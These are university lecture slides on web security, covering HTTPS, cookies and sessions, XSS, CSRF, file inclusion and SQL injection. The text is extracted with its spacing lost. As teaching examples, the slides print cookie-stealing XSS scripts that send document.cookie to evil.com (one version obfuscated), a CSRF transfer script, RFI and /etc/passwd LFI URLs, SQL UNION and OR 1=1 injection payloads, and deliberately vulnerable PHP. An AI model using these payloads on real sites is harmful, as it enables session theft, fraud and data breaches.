Web Security - University of Arizona - Computer Science Department

slicedmitesSécurité

16 févr. 2014 (il y a 3 années et 3 mois)

61 vue(s)

CSc466/566
ComputerSecurity
20:WebSecurity
Version:2012/05/0312:41:30
DepartmentofComputerScience
UniversityofArizona
collberg@gmail.com
Copyright
c
￿2012ChristianCollberg
ChristianCollberg
1/74
Outline
1
Introduction
2
HTTPS
3
DynamicContent
DOMTree
SessionsandCookies
4
AttacksonClients
SessionHijacking
Click-Jacking
PrivacyAttacks
XSS
CSRF
5
AttacksonServers
PHP
FileInclusion
SQLInjectionAttacks
6
Summary
Introduction2/74
StaticWebContent
HTTPRequest


GET/index.htmlHTTP/1.1
Host:www.site.com


HTTPResponse


HTTP/1.1200OK
Server:Appache
Date:Mon,16Apr201221:44:29GMT
Expires:−1
Content−Type:text/html;charset=ISO−8859−1
Set−Cookie:...
Content−Length:314
<!doctypehtml>
<html><body>
...
</body></html>


Introduction3/74
HTML
HTTPRequest


GET/index.htmlHTTP/1.1
Host:www.site.com


HTTPResponse


<b>boldtext</b>
<ul>
<li>listitem1
<li>listitem2
</ul>
<ahref=”site.com/boat.jpg”>Link!</a>
<script>
document.location=...
</script>
<imgsrc=”boat.jpg”>


Introduction4/74
Forms
www.site.com/register.php


<html><title>Registration</title
>
<HTML>
<TITLE>Registration</TITLE>
<BODY>
<FORMACTION=”register.php”METHOD=”GET”>
<INPUTTYPE=”text”NAME=”name”>
<INPUTTYPE=”text”NAME=”email”>
<INPUTTYPE=”submit”VALUE=”Submit”
>
</FORM
>
</BODY
>
</HTML>


HTTPRequest


www.site.com/register.php?
name=”Alice”&
email=”alice@gmail.com”


Introduction5/74
Confidentiality
HTTPrequestsandresponsesaredeliveredviaTCPonport
80.
Alltrafficis
intheclear!
MITMattacks.
Introduction6/74
Outline
1
Introduction
2
HTTPS
3
DynamicContent
DOMTree
SessionsandCookies
4
AttacksonClients
SessionHijacking
Click-Jacking
PrivacyAttacks
XSS
CSRF
5
AttacksonServers
PHP
FileInclusion
SQLInjectionAttacks
6
Summary
HTTPS7/74
HTTPoverSecureSocketLayer(HTTPS)
1
Alicebrowsesto
https://chase.com
2
Thebrowsersends
chase.com
alistofcryptographicciphers/hash
functionsitsupports.
3
Theserverselectsthestrongestciphers/hashfunctionsthey
bothsupport.
4
chase.com
tellsthebrowserofitscryptographicchoices.
5
chase.com
sendsthebrowseritscertificateCert
chase.com
,
containingitspublickeyP
chase.com
.
6
ThebrowserverifiestheauthenticityofCert
chase.com
.
7
BrowsergeneratesarandomnumberR.
8
ThebrowserencryptsRwithP
chase.com
andsendsitto
chase.com
.
9
StartingfromR,thebrowserand
chase.com
generateashared
secretkeyK.
10
SubsequentmessagesM:sendE
K
(M),H(K||M).
HTTPS8/74
Cross-SiteRequestForgery—LoginAttack...
Alice
chase.com
verisign.com
https://chase.com
3DES,AES,SHA-1,...
Let’suseAES,SHA-1!
Cert
chase.com
Verifychase.com
E
P
chase.com
(R)
E
K
(M),H(K||M)
E
K
(M),H(K||M)
HTTPS9/74
DigitalCertificates
A
CertificateAuthority(CA)isa
trustedthirdparty(TTT)
whoissuesacertificatestatingthat
TheBobwholivesonDesolationRowandhas
phonenumber(555)867-5309andtheemail
address
bob@gmail.com
hasthepublickeyP
B
.This
certificateisvaliduntilJune11,2012.
TheCAhastodigitallysign(withtheirprivatekeyS
CA
)this
certificatesothatweknowthatit’sreal.
HTTPS10/74
ExtendedValidationDigitalCertificates
DomainvalidationonlySSLcertificates:onlyminimal
verificationofthedetailsinthecertificate.
A
ExtendedValidationCertificatecanonlybeissuedbyaCA
whopassesanaudit,thattheyvetapplicationsaccordingto
strictcriteria.
SamestructureasotherX.509publickeycertificates.
Notstrongerencryption.
HTTPS11/74
ExtendedValidationDigitalCertificates...
In2006,researchersatStanfordUniversityandMicrosoft
ResearchconductedausabilitystudyoftheEVdisplayin
InternetExplorer7.Theirpaperconcludedthat
participantswhoreceivednotraininginbrowsersecurity
featuresdidnotnoticetheextendedvalidationindicator
anddidnotoutperformthecontrolgroup,whereas
participantswhowereaskedtoreadtheInternetExplorer
helpfileweremorelikelytoclassifybothrealandfake
sitesaslegitimate.
Source:
http://en.wikipedia.org/wiki/Extended_Validation_Certificate
HTTPS12/74
CertificateHierarchy
Certificatesaresignedbycertificateshigherina
certificatehierarchy.
The
rootcertificateis
self-signed.
ChainofTrust—SimilartotheTrustedPlatformModule’s
trustedboot.
HTTPS13/74
CheckingtheValidityofaCertificate
IsthecertificatesignedbyaknowntrustedCA(pre-installed
inthebrowser)?
Hasthecertificateexpired?
Isthecertificaterevoked?
1
Extractthe
revocationciteURLfromthecertificate.
2
Getthecertificaterevocationlist.
3
IsthelistsignedbytheCA?
4
Isthiscertificateserialnumberonthelist?
HTTPS14/74
In-ClassExercise:Goodrich&TamassiaC-7.8
Supposeawebclientandwebserverforapopularshopping
websitehaveperformedakeyexchangesothattheyarenow
sharingasecretsessionkey.
Describeasecuremethodforthewebclienttothennavigate
aroundvariouspagesoftheshoppingsite,optionallyplacing
thingsintoashoppingcart.
Yoursolutionisallowedtouseone-wayhashfunctionsand
pseudo-randomnumbergenerators,butitcannotuseHTTPS,
soitdoesnotneedtoachievecondentiality.
YoursolutionshouldberesistanttoHTTPsessionhijacking
evenfromsomeonewhocansniffallthepackets.
HTTPS15/74
Outline
1
Introduction
2
HTTPS
3
DynamicContent
DOMTree
SessionsandCookies
4
AttacksonClients
SessionHijacking
Click-Jacking
PrivacyAttacks
XSS
CSRF
5
AttacksonServers
PHP
FileInclusion
SQLInjectionAttacks
6
Summary
DynamicContent16/74
DynamicContent
Plainhtmlpagesare
static.
Dynamiccontentcanchange,evenwithoutreloadingthe
page.
Client-sidescriptsareincludedinwebpagestoprovide
dynamiccontent.
Webpagesarerepresentedinternallyinthebrowseras
DOMtrees(
DocumentObjectModel).
ScriptscanmanipulatetheDOMtree.
Mostscriptsarewrittenin
JavaScript.
DynamicContent17/74
DOMTreeExample


<html>
<head>
<title>Thedocument</title>
</head>
<body>
<div>Data</div>
<ul>
<li>Warning</li>
<li></li>
</ul>
<div>TopSecret!</div>
</body>
</html>


Source:
http://javascript.info/tutorial/dom-nodes
DynamicContent18/74
DOMTreeExample...
HTML
HEAD
TITLE
Thedocument
BODY
DIV
Data
UL
LI
Warning
LI
DIV
TopSecret!
DynamicContent19/74
JavaScript
JavaScriptcodecanbeincludedwithinHTMLdocuments:


<scripttype=”text/javascript”>
functionhello(){
alert(”Helloworld!”);
}
</script>


JavaScriptfunctionscanbeinvokedasaresultofclicks,etc.:


<imgsrc=”...”
onMouseOver=”javascript:hello()”>


DynamicContent20/74
DOMTreeTraversal
DOMtreenodeproperties:
name
description
firstChild,lastChild
start/endofthisnode’slistof
children
childNodes
arrayofallthisnode’schildren
nextSibling,previousSibling
neighboringnodeswiththe
sameparent
parentNode
theelementthatcontainsthis
node
Thus,youcantraversetheDOMtreefromwithinJavaScript:


window.document.childNodes[0].childNodes[1].
childNodes[4]


DynamicContent21/74
Sessions
HTTPisa
state-lessprotocol:
everytimeabrowserasksforapageisaneweventtothe
server;
theserverkeepsnoinformation(automatically)betweenpage
loads.
A
sessionisextrainformationstoredaboutavisitorbetween
interactions.
Threemethodstokeeptrackofsessions:
1
Hiddenformfields,
2
Client-sidecookies,
3
Server-sidesession.
Wemustprotectagainst
sessionhijacking—anattacker
gettingholdofauser’ssessioninformationandimpersonating
himtotheserver.
DynamicContent22/74
SessionsUsingHiddenFormFields
Anyinformationthatneedstosurvivebetweeninteractionsis
storedinthebrowserin
hiddenfieldsintheHTML.
TheinformationissentbacktotheserverinPOSTorGET
requests.


<HTML><BODY>
<FORMACTION=”http://www.victoriassecret.com/buy.jsp”
METHOD=”get”>
<INPUTTYPE=”hidden”NAME=”name”VALUE=”Alice”>
<INPUTTYPE=”hidden”NAME=”height”VALUE=”170cm”>
<INPUTTYPE=”hidden”NAME=”weight”VALUE=”53kg”>
<INPUTTYPE=”submit”>
</FORM>
</BODY></HTML>


HTTPissentincleartext—susceptibletoMITMattack.
DynamicContent23/74
SessionsUsingHiddenFormFields...
Eve
name=Alice&height=170cm&weight=53kg
<INPUTTYPE=”hidden”NAME=”name”VALUE=”Alice”>
<INPUTTYPE=”hidden”NAME=”height”VALUE=”170cm”>
<INPUTTYPE=”hidden”NAME=”weight”VALUE=”53kg”>
UseHTTPSinstead.
DynamicContent24/74
SessionsUsingCookies
A
cookieisapieceofdatasenttotheclientbytheweb
server.
Thecookieisstoredontheclient.
Whentheuserreturnstothesite,thecookieissenttothe
webserver.
cookie


”name”=”Alice”
”height”=”170cm”
”weight”=”53kg”
expire=10Dec,2012
domain=.victoriassecret.com
path:/
sendfor:anytype


DynamicContent25/74
SessionsUsingCookies
Let’sassumeAliceisbrowsingto
http://www.victoriassecret.com
.
Shefillsoutaformwithherpersonaldata:


<HTML><BODY>
<FORMACTION=”http://www.victoriassecret.com/buy.jsp”
METHOD=”get”>
<INPUTTYPE=”input”NAME=”name”VALUE=”Alice”>
<INPUTTYPE=”input”NAME=”height”VALUE=”170cm”>
<INPUTTYPE=”input”NAME=”weight”VALUE=”53kg”>
<INPUTTYPE=”submit”>
</FORM>
</BODY></HTML>


DynamicContent26/74
SessionsUsingCookies...
cookie


”name”=”Alice”
”height”=”170cm”
”weight”=”53kg”
expire=10Dec,2012
domain=.victoriassecret.com
path:/
sendfor:anytype


<INPUTTYPE=”input”NAME=”name”VALUE=”Alice”
>
<INPUTTYPE=”input”NAME=”height”VALUE=”170cm”
>
<INPUTTYPE=”input”NAME=”weight”VALUE=”53kg”
>
cookie


”name”=”Alice”
”height”=”170cm”
”weight”=”53kg”
expire=10Dec,2012
domain=.victoriassecret.com
path:/
sendfor:anytype


cookie


”name”=”Alice”
”height”=”170cm”
”weight”=”53kg”
expire=10Dec,2012
domain=.victoriassecret.com
path:/
sendfor:anytype


SessionsUsingCookies—CookieProperties
Expirationdate:nonespecified,thecookieisdeletedwhen
theuserexitsthebrowser.
Domainname—thesiteforwhichthiscookieisvalid:
Onlyhostswithinadomaincansetacookieforthatdomain.,
Asubdomaincansetacookieforadomainatmostonelevel
up.
Asubdomaincanaccessacookieforthetop-leveldomain.
AhostcannotsetcookiesfortheTLDs.
DynamicContent28/74
CookieDomains
mail.example.com
example.com
one.mail.example.com
example.com
domain:example.com
domain:mail.example.com
domain:example.com
domain:.com
SET
/////SET
READ,/////
SET
//////////////
SET,READ
DynamicContent29/74
CookieTransport
Cookies,bydefault,aresentusingHTTP.
MITMattacks!
Countermeasures:
1
Setthe
secureflag:HTTPSisusedinstead.
2
Encryptthecookievalue.
3
Obfuscatethecookiename.
DynamicContent30/74
Server-SideSessions
Userinformationiskeptinadatabaseontheserver.
A
sessionID(
sessiontoken)identifiestheuser’ssession.
GET/POSTvariablesorcookiesareusedtostorethetokenon
theclient.
Whentheuserbrowsestoapage,thetokenissenttothe
server,andtheuser’sdataislookedupfromthedatabase.


<HTML><BODY>
<FORMACTION=”http://www.victoriassecret.com/buy.jsp”
METHOD=”get”>
<INPUTTYPE=”hidden”NAME=”sessionID”VALUE=”0x324A...”>
</FORM>
</BODY></HTML>


DynamicContent31/74
Server-SideSessions
sessionID
data
0x878...
name="Alice",height="170cm",...
0x9A5...
name="Bob",height="180cm",...
sessionID=0x878...
ThesessionIDshouldbehardtoguess.
DynamicContent32/74
Outline
1
Introduction
2
HTTPS
3
DynamicContent
DOMTree
SessionsandCookies
4
AttacksonClients
SessionHijacking
Click-Jacking
PrivacyAttacks
XSS
CSRF
5
AttacksonServers
PHP
FileInclusion
SQLInjectionAttacks
6
Summary
AttacksonClients33/74
SessionHijacking
TCPsessionhijackingcanbeusedtotakeoveranHTTP
session.
Theattackerneedstoimpersonatethesessionmechanism
(cookies,POST/GET,sessionID).
PacketsnifferscanbeusedtodiscoversessionIDs/cookies.
Replayattacks:anattackerusesanold(previouslyvalid)
tokentoattemptanHTTPsessionhijackingattack.
AttacksonClients34/74
SessionHijacking
Alice
sessionID
data
0x878...
name="Alice"
height="170cm"
0x9A5...
name="Bob"
height="180cm"
Eve
sessionID=0x878...
sessionID=0x878...
AttacksonClients35/74
SessionHijacking—Countermeasures
1
Client-sidesessiontokensneedtobeencrypted.
2
Server-sidesessionIDsneedtoberandom.
3
Toprotectagainstreplayattacks:
1
addrandomnumberstoclient-side/server-sidetokens,
2
changesessiontokensfrequently.
AttacksonClients36/74
Click-Jacking
Clickingonalinktakesyoutothewrongsite:


<aonMouseUp=window.open(”http://www.evil.com”)
href=”http://www.trusted.com”>TrustMe!</a>


Click-fraud:Increasingthe
click-throughstoincrease
advertisingrevenue.
AttacksonClients37/74
PrivacyAttacks—Third-partycookies
1
Youbrowseto
http://www.example1.com
:


<HTML><BODY>
<imgsrc=”http://ads.evil.com”>
</BODY></HTML>


2
ads.evil.com
issetsa
third-partycookieonyourmachine!
3
Youbrowseto
http://www.example2.com
:


<HTML><BODY>
<imgsrc=”http://ads.evil.com”>
</BODY></HTML>


4
ads.evil.com
setsa
third-partycookieonyourmachine!
5
Youbrowseto
http://www.ads.evil.com
,itreadsyourcookies,and
getsyourbrowsinghistory!
AttacksonClients38/74
Cross-SiteScripting(XSS)
Idea:
1
attackerinjectscodeCintoawebsite,
2
CmakesitswayintogeneratedwebpageP,
3
auserisservedthePpage,
4
theinjectedcodeCisexecutedontheuser’ssite.
Whydoesthiswork?Thewebprogrammerforgetstocheck
(
sanitize)inputvalues!
AttacksonClients39/74
Cross-SiteScripting...
Bob’sserversendsAlicethisform:


<HTML>
<TITLE>SignMyGuestbook!</TITLE>
<BODY>
<FORMACTION=”sign.php”METHOD=”POST”>
<INPUTTYPE=”text”NAME=”name”>
<INPUTTYPE=”text”NAME=”message”size=”40”>
<INPUTTYPE=”submit”VALUE=”Submit”>
</FORM>
</BODY>
</HTML>


AttacksonClients40/74
Cross-SiteScripting...
Aliceaddsthetext"Ilovedyournewsite!",and
returnsittoBob’ssite.
Inreturn,Bobsendsheranewpage:


<HTML>
<TITLE>SignMyGuestbook!</TITLE>
<BODY>
Thankseverybodyforyourinput!<br>
Eve:Isatbehindyouin7thgrade!Callme!<br>
Joe:Yo,frat−bro,let’sgrabsomebrewskies!<br>
Alice:Ilovedyournewsite!<br>
</BODY>
</HTML>


AttacksonClients41/74
Cross-SiteScripting...
WhatifEvehadinsteadaddedthetext


<script>alert(”Alicesucks!”)>;/script>


ashercomment?
ThenAlicewouldbeexecutingthispage:


<HTML>
<TITLE>SignMyGuestbook!</TITLE>
<BODY>
Thankseverybodyforyourinput!<br>
Eve:<script>alert(”Alicesucks!”)>;/script><br>
Joe:Yo,frat−bro,let’sgrabsomebrewskies!<br>
Alice:Ilovedyournewsite!
</BODY>
</HTML>


AttacksonClients42/74
Cross-SiteScripting...
Obviously,Evecouldinsertmoreharmfulcode:


<script>
document.location=
”http://www.evil.com/steal.php?cookie=”+
document.cookie;
</script>


Thisredirectsthebrowsertotheevilsite,andpassesalong
Alice’scookies.
Alicewouldnoticethatshe’sbeingredirectedtoaweirdsite!
AttacksonClients43/74
Cross-SiteScripting...
Evecouldbemorecunning:


<script>
img=newImage();
img.src=”http://www.evil.com/steal.php?cookie=”+
document.cookie;
</script>


Thebrowsertriestoloadanimagefromtheevilsite,passing
alongthecookie.
Noimageisdisplayed—Alicedoesn’tgetsuspicious!
AttacksonClients44/74
Cross-SiteScripting...
Aniframeisusedtocreateawebpagewithinawebpage:


<iframeframeborder=0src=””height=0
width=0id=”XSS”name=”XSS”>
</iframe>
<script>
frames[”XSS”].location.href=
”http://www.evil.com/steal.php?cookie=”+
document.cookie;
</script>


Thiscreatesaninvisibleiframe,addingittotheDOM.
Thescriptchangesthesourceoftheiframetotheevilsite.
AttacksonClients45/74
Cross-SiteScripting—Nonpersistent
Sofar,we’veseen
persistentXSSattacks:
thecodeEveinjectsgetsaddedtotheserver’sdatabase;
thecodeisdisplayedonthewebpage.
Non-persistentXSSattack:theinjectedcodeonlypersists
overtheattacker’ssession.
Example:
1
attackersearchesfor"sneezingpanda",
2
websiterespondswith
"searchresultsfor’sneezingpanda’=..."
AttacksonClients46/74
Cross-SiteScripting—Nonpersistent...
AssumeasearchpagewherethequeryispassedasaGET
parameter:


http://victim.com/search.php?query=searchstring


TheattackerconstructsthisURL:


http://victim.com/search.php?query=
<script>
document.location=
”http://evil.vom/steal.php?cookie=”+
document.cookie
</script>


WhenthevictimnavigatestotheURL,thepayloadwillbe
executedintheirbrowser.
AttacksonClients47/74
Cross-SiteScripting—Countermeasures
Programmersmustsanitizeallinputs:
Stripoutall<script>tags!
Userscandisableclient-sidescripts.
FirefoxNoScriptXSSdetectionsanitizesGET/POSTvariables:
removequotes,doublequotes,brackets.
AttacksonClients48/74
Cross-SiteScripting—Counter-Countermeasures
EvadefilteringbyobfuscatingGETrequestsusing
URLencoding.
Thisrequest


<script>alert(’hello’);</script>


turnsinto


%3Cscript%3Ealert%28%27hello
%27%29%3B%3C%2Fscript%3E


AttacksonClients49/74
Cross-SiteScripting—Counter-Countermeasures...
Obfuscatethescripttoavoiddetection:


<script>
a=document.cookie;
b=”tp”;
c=”ht”;
d=”://”;
e=”ww”;
f=”w.”;
g=”vic”;
h=”tim”;
i=”.c”;
j=”om/search.p”;
k=”hp?q=”;
document.location=b+c+d+e+f+g+h+i+j+k+a;
</script>


AttacksonClients50/74
Cross-SiteRequestForgery(CSRF)
Basicidea:
1
Alicehasanaccountwithwww.bob.com.
2
www.bob.comtrustsAlice.
3
Aliceisauthenticatedwithwww.bob.com(throughanactive
cookie,forexample).
4
Alicevistsasitewww.evil.com.
5
www.evil.comexecutesamaliciousscriptonwww.bob.com
(whothinkshe’stalkingtoAlice!).
I.e.inaCSRFattackawebsiteexecutescommandsit
receivedfromauserittrusts.
AttacksonClients51/74
Cross-SiteRequestForgery(CSRF)...
Aliceisloggedintoherbank
www.bank.com
,herauthentication
storedinacookie.
Shevisits
www.evil.com
thathasthisscript:


<script>
document.location=”http://bank.com/transfer.php?
amount=1000&
from=Alice&
to=Eve”;
</script>


Alice’browserredirectstoherbankwhichexecutesthe
transfer.
AttacksonClients52/74
Cross-SiteRequestForgery—LoginAttack
Amaliciouswebsiteissuescross-siterequestsonbehalfofthe
user,butmakestheuserauthenticateastheattacker.
Example:
1
Aliceorderscookiesfromevescookies.com.
2
Alicelogsintopaypal.comtopayforthecookies.
3
But,EvehasinjectedcodethatmakesAliceauthenticateto
PayPalasEve.
4
Alicegivespaypal.comhercreditcardnumber.
5
Evelogsintopaypal.comtocollectAlice’screditcard
number.
AttacksonClients53/74
Cross-SiteRequestForgery—LoginAttack...
evescookies.com
paypal.com
Alice
buy cookies!
script:user=eve,pw=cookies
payforcookies!
login:user=eve,pw=cookies
VISA=4750...
login
VISA=4750...
AttacksonClients54/74
Outline
1
Introduction
2
HTTPS
3
DynamicContent
DOMTree
SessionsandCookies
4
AttacksonClients
SessionHijacking
Click-Jacking
PrivacyAttacks
XSS
CSRF
5
AttacksonServers
PHP
FileInclusion
SQLInjectionAttacks
6
Summary
AttacksonServers55/74
AttacksonServers
Server-sidescriptsexecutecodeontheservertogenerate
dynamicpages.
Writteninphp,perl,JavaServlets,....
Accessdatabases,....
AttacksonServers56/74
GeneratingDynamicContent
Alice
php
mysql
connect
<html>...</html>
name=Alice,pw=love
name=Alice,pw=love
SELECT...
data
<html>...</html>
<html>...</html>
AttacksonServers57/74
PHP
<?phpinsertcodehere?>.
$
GET[variable]—arrayofGETinputvariables.
Notyping.


<HTML>
<BODY>
Yournumber:<?phpecho$x=$
GET[’number’];?>.
Squareis<?pho$y=$x∗$x;echo$y;?>.
</BODY>
</HTML>


AttacksonServers58/74
PHP...
AssumetheGETvariablenumberis5,thenPHPwillgenerate
thispage:


<HTML>
<BODY>
Yournumber:5.
Squareis25.
</BODY>
</HTML>


AttacksonServers59/74
RemoteFileInclusion(RFI)
Letthisbeindex.php:


<?php
include(”header.html”);
include(”$
GET[’page’].”.php”);
include(”footer.html”);
?>


Ausercangoto
www.cnn.com/index.php?page=news
andanewspageis
generated.
Anattackercangoto


http://cnn.com/index.php?page=http://evil.com/evilcode


forcingtheservertoincludeandexecutethe
remotefile
evilcode.php.
MostsitesnowforbidRFI.
AttacksonServers60/74
LocalFileInclusion(LFI)
AsRFI,butalocalfilegetsexecuted


http://www.cnn.com/index.php?page=secretpage


Gettingthepasswordfile:


http://www.cnn.com/index.php?page=/etc/passwd%00


%00isanullbyte,effectivelyremovingthe.phpextension.
AttacksonServers61/74
LocalFileInclusion(LFI)...
Attack:Theattacker
1
uploadsafile(aphpscripthidingasa.jpgfile,forexample).
2
tricksthesitetoexecutetheuploadedfileusingLFI.
Eve
flicker.com
boat.jpg


<?php...?
>


flicker.com/index.php?page=pics/boat.jpg
AttacksonServers62/74
LocalFileInclusion(LFI)...
Forexample,NasvirNagra’sVisualizeprogram
http://search.cpan.org/~jnagra/Perl-Visualize-1.02/Visualize.pm
canembedaperlscriptintoagiffile,sothatthefileis
bothanimageandanexecutableprogram.
AttacksonServers63/74
AccessingaBackendDatabase
Alice
php
mysql
name=Alice,pw=love
name=Alice,pw=love
SELECT...
data
AttacksonServers64/74
SQLtables
SQLdatabasesstorerecordsastables:
id
title
author
body
1
Databases
John
Story1
2
Computers
Joe
Story2
3
Security
Jane
Story3
4
Technology
Julia
Story4
AttacksonServers65/74
SQLcommands
SQLcommandsforaccessingarelationaldatabase:
SELECT
extractrecordsfromtables
INSERT
insertnewrecordsinatable
UPDATE
alterarecordinatable
DELETE
removearecordinatable
UNION
combinetheresultsofmultiplequeries
AttacksonServers66/74
SQLqueries
id
title
author
body
1
Databases
John
Story1
2
Computers
Joe
Story2
3
Security
Jane
Story3
4
Technology
Julia
Story4
SELECT*FROMnewsWHEREid=3
SELECTbodyFROMnewsWHEREauthor="joe"
AttacksonServers67/74
SQLInjectionAttack


<?php
$query=’SELECT∗FROMnewsWHEREid=’.$
GET[’id’];
$out=mysql
query($query);
echo”<ul>”
while($row=mysql
fetch
array($out)){
echo”<li>”.$row[’id’];
echo”<li>”.$row[’title’];
echo”<li>”.$row[’author’];
echo”<li>”.$row[’body’];
}
echo”</ul>”
?>


AttacksonServers68/74
SQLInjectionAttack...
ConsiderthisURL:


http://www.cnn.com/news.php?id=3


Thequerywould
1
extractthe3rdnewsarticle,
2
generateanHTMLpage,and
3
sendittotheuser.
AttacksonServers69/74
SQLInjectionAttack...
Considerinstead


http://www.cnn.com/news.php?id=NULLUNION
SELECTcardno,first,last,emailFROMusers


SincethePHPcodeis


<?php
$query=’SELECT∗FROMnewsWHEREid=’.$
GET[’id’];
...
?>


thiswouldforcetheservertoexecute


SELECT∗FROMnewsWHEREid=NULLUNION
SELECTcardno,first,last,emailFROMusers


revealingallaccountinformation.
AttacksonServers70/74
SQLInjection—BypassingAuthentication
Considerthisserver-sideloginscript:


<?php
$query=’SELECT∗FROMnews
WHEREemail=’.$
POST[’email’].’”’.
’ANDpwdhash=”’.hash(’sha256’,$
POST[’password’]).’”’;
if(mysql
num
rows($out)>0){
echo”Loginsuccessful!”;
}else{
$access=false;
echo”Loginfailed”;
}
?>


AttacksonServers71/74
SQLInjection—BypassingAuthentication
Lettheattackerenterthisintotheloginform:
email="OR1=1;--
password=(empty)
Then,theoriginalquery


SELECT∗FROMnewsWHEREemail=’.$
POST[’email’].’”’.
’ANDpwdhash=”’.hash(’sha256’,$
POST[’password’]).’”’


turnsinto


SELECT∗FROMnewsWHEREemail=””
OR1=1;−−ANDpwdhash=...


Notethat--isPHP’scommentcharacter.
Thequeryreturnstheentireusertabletotheattacker.
AttacksonServers72/74
Outline
1
Introduction
2
HTTPS
3
DynamicContent
DOMTree
SessionsandCookies
4
AttacksonClients
SessionHijacking
Click-Jacking
PrivacyAttacks
XSS
CSRF
5
AttacksonServers
PHP
FileInclusion
SQLInjectionAttacks
6
Summary
Summary73/74
ReadingsandReferences
Chapter7inIntroductiontoComputerSecurity,byGoodrich
andTamassia.
Summary74/74